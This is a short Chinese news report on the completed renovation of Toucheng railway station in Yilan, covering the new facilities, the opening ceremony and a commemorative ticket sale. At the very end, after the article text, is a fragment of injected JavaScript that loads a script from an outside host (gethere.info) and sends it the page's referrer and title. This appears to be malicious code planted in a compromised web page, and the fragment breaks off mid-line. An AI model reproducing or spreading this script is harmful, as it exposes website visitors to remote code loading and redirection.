擁有「開蘭第一城」的美譽的宜蘭頭城鎮,是東北角最耀眼的觀光熱點。其中,頭城車站原有站體自民國51年站體改建完工後,隨著歲月流逝站體日漸老舊、旅客人數不斷增加,為提供符合民眾旅運需求及融合地方特色的車站空間,台鐵局編列經費2千8百餘萬元辦理「頭城車站整建工程」,自104年6月起開始整建,並於今年11月完工。

頭城車站改建完工後,車站的磚砌拱門廊道及站前廣場車道的拱橋意象,讓民眾感受到早期頭城老街的往日風情。擴建後的候車大廳及新建的無障礙廁所與哺乳室,提升頭城站的服務品質。

台鐵今日上午11時於頭城火車站站前廣場舉辦整建完工啟用典禮,為配合啟用慶祝活動,在頭城站1號售票窗口同步發售紀念套票供旅客紀念收藏,票套內含名片式月台票各2張及莒光特快車票1張,計發售500套,每套售價150元,每人限購6套,數量有限,售完為止。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;